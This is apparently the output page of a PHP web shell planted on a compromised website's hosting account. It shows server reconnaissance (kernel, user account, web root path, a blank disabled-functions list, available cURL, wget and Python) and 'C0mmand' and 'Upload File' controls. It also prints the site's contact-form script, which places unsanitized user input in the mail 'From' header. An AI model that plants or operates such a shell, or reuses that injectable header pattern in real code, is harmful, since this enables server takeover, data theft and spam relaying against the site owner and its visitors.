Server IP : 2a02:4780:11:1361:0:bf7:7935:10 / Your IP : 18.222.112.231 Web Server : LiteSpeed System : Linux in-mum-web1261.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u200767797 ( 200767797) PHP Version : 8.1.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u200767797/domains/drusonpharma.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php if(isset($_POST["send"])){ $name=$_REQUEST["name"]; $email=$_REQUEST["email"]; $phone=$_REQUEST["phone"]; $website=$_REQUEST["website"]; $subject=$_REQUEST["subject"]; $message=" Name : $name Email : $email Phone : $phone website : $website subject : $subject "; $headers="From:$email"; $to="dezirewebsolutions14@gmail.com"; $subject=" Website Form submitted By: $phone"; $sent=mail($to,$subject,$message,$headers); if($sent){ echo "<script>alert('Form Has Been Submitted'); window.location='index.html'</script>"; } } ?>